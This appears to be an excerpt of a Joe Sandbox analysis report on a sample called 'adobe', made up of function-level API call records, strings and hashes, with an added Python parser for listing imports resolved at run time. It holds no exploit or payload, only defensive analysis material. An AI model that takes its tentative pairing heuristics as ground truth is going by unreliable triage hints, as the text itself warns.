                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FocusMessageStateTextWaitWindow
                                                                                                                                                          • String ID: Wnd=$%x
                                                                                                                                                          • API String ID: 1381870634-2927251529
                                                                                                                                                          • Opcode ID: 74c7d81c0a94b14d72896173badfac2de004896181af197dda579923c67c8a60
                                                                                                                                                          • Instruction ID: f0690932e29077b4fb13f85f05d0aefb3d3524bf13f98187e5fd5d5cdf43dc38
                                                                                                                                                          • Opcode Fuzzy Hash: 74c7d81c0a94b14d72896173badfac2de004896181af197dda579923c67c8a60
                                                                                                                                                          • Instruction Fuzzy Hash: 8711A330608244EFC701EF65DC42A9E77B9EB09718B9184B6FC08E3791D73C6E00DA69
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • FileTimeToLocalFileTime.KERNEL32(000000FF), ref: 0046D790
                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?,000000FF), ref: 0046D79F
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Time$File$LocalSystem
                                                                                                                                                          • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                                                                                                                          • API String ID: 1748579591-1013271723
                                                                                                                                                          • Opcode ID: 0a98023ab13e448872c12fbe6f13c89687d1b5f5aae4a43975ed4079bbbdddec
                                                                                                                                                          • Instruction ID: b3b582457b019a17bb8afa83b58bfba6494bfd74b872bfeb83ea535623e92781
                                                                                                                                                          • Opcode Fuzzy Hash: 0a98023ab13e448872c12fbe6f13c89687d1b5f5aae4a43975ed4079bbbdddec
                                                                                                                                                          • Instruction Fuzzy Hash: CE11FBA090C3909AD340DF6AC44432BBAE4AB89714F04492EF9D8D6381E779C948DBB7
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,[!H,?,00000001,?,?,0048215B,?,00000001,00000000), ref: 0042DD60
                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 0048217D
                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 004821A0
                                                                                                                                                          Strings
                                                                                                                                                          • System\CurrentControlSet\Control\Windows, xrefs: 0048214A
                                                                                                                                                          • CSDVersion, xrefs: 00482174
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                          • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                                                                                                                          • API String ID: 3677997916-1910633163
                                                                                                                                                          • Opcode ID: f017cad2ed831413fc80ac0a9559e600e41906ea6a01450b0a6b9b0332386435
                                                                                                                                                          • Instruction ID: 234b749f7f851cfbfd5644349c5fd5927c737282cf1b30e82c7fcc64daf3ae2d
                                                                                                                                                          • Opcode Fuzzy Hash: f017cad2ed831413fc80ac0a9559e600e41906ea6a01450b0a6b9b0332386435
                                                                                                                                                          • Instruction Fuzzy Hash: 1CF03675E40209B6DF10EAD08D49B9F73BCAB05704F604567EE10E7280E7B89A448759
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,[!H,?,00000001,?,?,0048215B,?,00000001,00000000), ref: 0042DD60
                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00458CC1,00000000,00458E79,?,00000000,00000000,00000000), ref: 00458BD1
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: CloseOpen
• String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
• API String ID: 47109696-2631785700
• Opcode ID: 1a33b2fff3c7ae31bce977b9663c7c724be55f04a92ed0b102073ff14c86d074
• Instruction ID: 6d8b28394c42fe518be87e1bc96ea370ff989b9669e1d7f51fc18c3a52dee8f8
• Opcode Fuzzy Hash: 1a33b2fff3c7ae31bce977b9663c7c724be55f04a92ed0b102073ff14c86d074
• Instruction Fuzzy Hash: 78F0A4B1704110ABD710EB1AE845F5A629CDB91356F20503FF581EB292CE7CDC068AAA
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,004531CA,00000000,0045326D,?,?,00000000,00000000,00000000,00000000,00000000,?,00453539,00000000), ref: 0042D8D6
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D8DC
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: GetSystemWow64DirectoryA$kernel32.dll
• API String ID: 1646373207-4063490227
• Opcode ID: 0314162b0ce3b3db5bac818b6afbefaed119cc9b0d2b55ba021accdda3190316
• Instruction ID: 226daeffb333c7fd56417753f7bf411e9e50fb36e69144697282a220664082a3
• Opcode Fuzzy Hash: 0314162b0ce3b3db5bac818b6afbefaed119cc9b0d2b55ba021accdda3190316
• Instruction Fuzzy Hash: 8CE026E0F00B0012D70035BA2C83B6B108D8B88729FA0443F7899F62C7DDBCDAC40AAD
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042E944), ref: 0042E9D6
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9DC
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: ShutdownBlockReasonDestroy$user32.dll
• API String ID: 1646373207-260599015
• Opcode ID: cf3e5377d2a5d653984701c19945938778551e2571298e4db392a1f8e4a5fdad
• Instruction ID: 6bc70aa2ebf4dd36f12f6c88582c327b68e43ec59fad8d4ed568611576548916
• Opcode Fuzzy Hash: cf3e5377d2a5d653984701c19945938778551e2571298e4db392a1f8e4a5fdad
• Instruction Fuzzy Hash: 05D0C7D3351733566D9071FB3CC19AB018C8A116B53540177F500F6141D99DCC4115AD
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,0049730B,00000001,00000000,0049732F), ref: 0049703A
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00497040
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: DisableProcessWindowsGhosting$user32.dll
• API String ID: 1646373207-834958232
• Opcode ID: e625468a081321e78befee22b7a2c2891f0201f6f4b774c15ed5751cb50e9a32
• Instruction ID: 452f54a6037127921152cef0656c2e9433c36e1ae577bdfae3f91b34ce646964
• Opcode Fuzzy Hash: e625468a081321e78befee22b7a2c2891f0201f6f4b774c15ed5751cb50e9a32
• Instruction Fuzzy Hash: F9B002D16E9701D4DD2032F20D57E1F0C484C4076575515777414F51C7FD6DD9045A7D
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0044AEAC: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044EFC9,004972BA), ref: 0044AED3
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044AEEB
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044AEFD
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044AF0F
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044AF21
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF33
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF45
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044AF57
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044AF69
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044AF7B
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044AF8D
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044AF9F
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044AFB1
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044AFC3
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044AFD5
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044AFE7
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044AFF9
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B00B
• LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004972DD), ref: 00463E2B
• GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00463E31
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: SHPathPrepareForWriteA$shell32.dll
• API String ID: 2238633743-2683653824
• Opcode ID: 719beb51feb1838192f6b60fe2ba0343982b08ecb80bdea613c2e6589c1835f4
• Instruction ID: 7d58e33019c036ad457fb907f94f1e4e419ce3fd113c1db0310001010c17eb6a
• Opcode Fuzzy Hash: 719beb51feb1838192f6b60fe2ba0343982b08ecb80bdea613c2e6589c1835f4
• Instruction Fuzzy Hash: 28B092A0A80780A8DE10BFB3A843A0B28048590B1A720403B302479083EB7E85145E7F
Uniqueness
Uniqueness Score: -1.00%

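The function records above repeat one pattern: a module lookup (GetModuleHandleA or LoadLibraryA) immediately followed by GetProcAddress, with the export name visible either as the second GetProcAddress argument (the uxtheme.dll chain under subcall 0044AEAC) or only as a leftover argument of the preceding lookup (GetSystemWow64DirectoryA, ShutdownBlockReasonDestroy, DisableProcessWindowsGhosting, SHPathPrepareForWriteA, where the report shows the DLL name in the GetProcAddress slot). The Python below is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses records in the report's plain-text form, pairs each GetProcAddress with the nearest module lookup in the same call chain, and returns the (dll, export) pairs so an analyst can diff them against the static import table. The line regex, the heuristic that treats a non-hex, non-DLL argument as an export name, and the abbreviation of the uxtheme sample to four calls are assumptions of this example; the sample lines themselves are copied from the records above.

```python
"""Parse the per-function 'APIs' records of a Joe Sandbox report and list the
Win32 symbols a sample resolves at run time (GetModuleHandleA/LoadLibraryA
followed by GetProcAddress) rather than through its static import table."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Set, Tuple

# One API line: optional "Part of subcall function XXXXXXXX:" prefix, then
# Api.MODULE(args), ref: XXXXXXXX. Calls without arguments (GetTickCount) have no parens.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<parent>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
HEX_ARG = re.compile(r"^[0-9A-F]{8}(\(.*\))?$")  # raw dword, optionally annotated with a constant name


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str
    parent: Optional[str]  # address of the subcall function, None for a direct call


@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)


def parse_record(text: str) -> FunctionRecord:
    """Turn one function record (its 'APIs' lines plus the 'String ID' line) into structured data."""
    rec = FunctionRecord()
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            rec.calls.append(ApiCall(m["api"], m["mod"], args, m["ref"], m["parent"]))
            continue
        s = line.strip()
        if s.startswith("• String ID:"):
            # Strings referenced by the function are '$'-separated; a leading empty item is common.
            rec.strings = [p.strip() for p in s[len("• String ID:"):].split("$") if p.strip()]
    return rec


def _is_symbol(a: str) -> bool:
    """Heuristic (assumption): an argument that is neither '?', a raw dword nor a DLL name is an export name."""
    return bool(a) and a != "?" and not HEX_ARG.match(a) and not a.lower().endswith(".dll")


def resolved_imports(rec: FunctionRecord) -> Set[Tuple[str, str]]:
    """Pair every GetProcAddress with the nearest preceding GetModuleHandleA/LoadLibraryA
    in the same call chain (same subcall parent) and return (dll, export) pairs."""
    found: Set[Tuple[str, str]] = set()
    last_load = {}  # subcall parent -> (dll, export names seen as leftover arguments of the lookup)
    for c in rec.calls:
        if c.api in ("GetModuleHandleA", "LoadLibraryA"):
            dll = next((a for a in c.args if a.lower().endswith(".dll")), None)
            # Assumption: when the report shows an export name among the lookup's trailing
            # arguments, that is the name about to be passed to GetProcAddress.
            last_load[c.parent] = (dll, [a for a in c.args if _is_symbol(a)])
        elif c.api == "GetProcAddress":
            dll, leftovers = last_load.get(c.parent, (None, []))
            # Prefer the second argument when the report captured a real name there;
            # otherwise fall back to the name seen on the preceding module lookup.
            if len(c.args) > 1 and _is_symbol(c.args[1]):
                sym = c.args[1]
            else:
                sym = leftovers[0] if leftovers else None
            if dll and sym:
                found.add((dll, sym))
    return found


# Sample records copied from the report (the uxtheme chain is abbreviated to four of its calls).
SAMPLE_UXTHEME = """\
APIs
  • Part of subcall function 0044AEAC: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044EFC9,004972BA), ref: 0044AED3
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044AEEB
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044AEFD
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B00B
• LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004972DD), ref: 00463E2B
• GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00463E31
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: SHPathPrepareForWriteA$shell32.dll
"""

SAMPLE_WOW64 = """\
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,004531CA,00000000,0045326D,?,?,00000000,00000000,00000000,00000000,00000000,?,00453539,00000000), ref: 0042D8D6
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D8DC
• String ID: GetSystemWow64DirectoryA$kernel32.dll
"""

if __name__ == "__main__":
    for name, sample in (("uxtheme/shell32", SAMPLE_UXTHEME), ("wow64", SAMPLE_WOW64)):
        print(name, sorted(resolved_imports(parse_record(sample))))
```

Feeding the full record text instead of the abbreviated sample recovers all of the uxtheme.dll exports listed above. The pairing relies on how the sandbox displayed stack contents at call time, so treat the output as triage hints to confirm in a disassembler rather than as ground truth; the Strings side of each record (`rec.strings`) gives an independent cross-check, since the export name and DLL appear there as well.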
APIs
• FindNextFileA.KERNEL32(000000FF,?,00000000,0047C5C8,?,?,?,?,00000000,0047C71D,?,00000000,?,00000000,?,0047C871), ref: 0047C5A4
• FindClose.KERNEL32(000000FF,0047C5CF,0047C5C8,?,?,?,?,00000000,0047C71D,?,00000000,?,00000000,?,0047C871,00000000), ref: 0047C5C2
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: Find$CloseFileNext
• String ID:
• API String ID: 2066263336-0
• Opcode ID: ad80c70025ab8b1a502d284fc4c36093cde674e045d6ff12e82b6a20ac10d9ad
• Instruction ID: 9cbd629fba0131c534336b548e2a3d064dbd11d36534118a4e528ca36bdac333
• Opcode Fuzzy Hash: ad80c70025ab8b1a502d284fc4c36093cde674e045d6ff12e82b6a20ac10d9ad
• Instruction Fuzzy Hash: 56813F7090025DAFCF11DF95CC91ADFBBB9EF49304F5080AAE418A7291D7399A46CF58
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0042ECA4: GetTickCount.KERNEL32 ref: 0042ECAA
  • Part of subcall function 0042EAFC: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042EB31
• GetLastError.KERNEL32(00000000,00474811,?,?,0049B178,00000000), ref: 004746FA
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: CountErrorFileLastMoveTick
• String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
• API String ID: 2406187244-2685451598
• Opcode ID: 14c72f99d3db5737e79d2ecf786cd78e52585d1ffa8f95a38f55a0f121dc5fc7
• Instruction ID: e9099c621665a946f5b0db8f2b3318fd5b54847bcac127bf4feb9123ba8a5391
• Opcode Fuzzy Hash: 14c72f99d3db5737e79d2ecf786cd78e52585d1ffa8f95a38f55a0f121dc5fc7
• Instruction Fuzzy Hash: 19417674A002198FCB10EFA5D882AFE77B4EF89314F518537E414B7391D73C9A058BA9
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetDesktopWindow.USER32 ref: 00413D56
• GetDesktopWindow.USER32 ref: 00413E0E
  • Part of subcall function 00418ED0: 6F5BC6F0.COMCTL32(?,00000000,00413FD3,00000000,004140E3,?,?,0049A628), ref: 00418EEC
  • Part of subcall function 00418ED0: ShowCursor.USER32(00000001,?,00000000,00413FD3,00000000,004140E3,?,?,0049A628), ref: 00418F09
• SetCursor.USER32(00000000,?,?,?,?,00413B03,00000000,00413B16), ref: 00413E4C
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: CursorDesktopWindow$Show
• String ID:
• API String ID: 2074268717-0
• Opcode ID: bdf797e27c36325bb8c82eddb0fe25cd735ab4185a90c7389a74a707800caf49
• Instruction ID: b367783c8e347dee620bf4ebb942fef05e7de29136c442ebf2d1f3a12f6593d4
• Opcode Fuzzy Hash: bdf797e27c36325bb8c82eddb0fe25cd735ab4185a90c7389a74a707800caf49
• Instruction Fuzzy Hash: 14415C75700250AFCB10EF39E984B9677E1AB64325F16807BE404CB365DA38ED91CF9A
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A7D
• LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AEC
• LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B87
• MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BC6
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: LoadString$FileMessageModuleName
• String ID:
• API String ID: 704749118-0
• Opcode ID: e5f82f84354ef0ca283ae45606e551eda4c159cf8a0135734a08b6be587c5a6c
• Instruction ID: 4dc4f8fa8e31f5a504acc487101d04bf7196a45c85b280592f63b9c2e46bb1d6
• Opcode Fuzzy Hash: e5f82f84354ef0ca283ae45606e551eda4c159cf8a0135734a08b6be587c5a6c
• Instruction Fuzzy Hash: 933154706083849EE330EB65C945BDB77E89B86304F40483FB6C8D72D1DB79A9088767
Uniqueness
Uniqueness Score: -1.00%

APIs
• SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E161
  • Part of subcall function 0044C7A4: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044C7D6
• InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E1E5
  • Part of subcall function 0042BBC4: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBD8
• IsRectEmpty.USER32(?), ref: 0044E1A7
• ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E1CA
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
• String ID:
• API String ID: 855768636-0
• Opcode ID: e0aac262193eaf386a507cc14a48f7de87f8a217b262bdcf0c3e92448fc10a7d
• Instruction ID: 2ff42263b9fd8d0bf3ebcb41181b8f96e25d68336b74147511caae446a0df0b7
• Opcode Fuzzy Hash: e0aac262193eaf386a507cc14a48f7de87f8a217b262bdcf0c3e92448fc10a7d
